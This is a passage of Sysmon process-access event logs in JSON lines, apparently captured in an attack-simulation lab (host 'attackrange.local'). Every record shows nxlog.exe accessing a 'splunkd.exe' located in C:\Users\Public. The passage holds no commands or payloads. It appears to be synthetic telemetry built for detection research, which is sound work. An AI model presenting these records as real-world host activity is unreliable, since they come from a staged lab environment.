(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:12.445\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:12.445","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:13.446\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:13.446","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:14.447\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:14.447","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:15.449\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:15.449","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:16.450\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:16.450","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:17.451\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:17.451","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
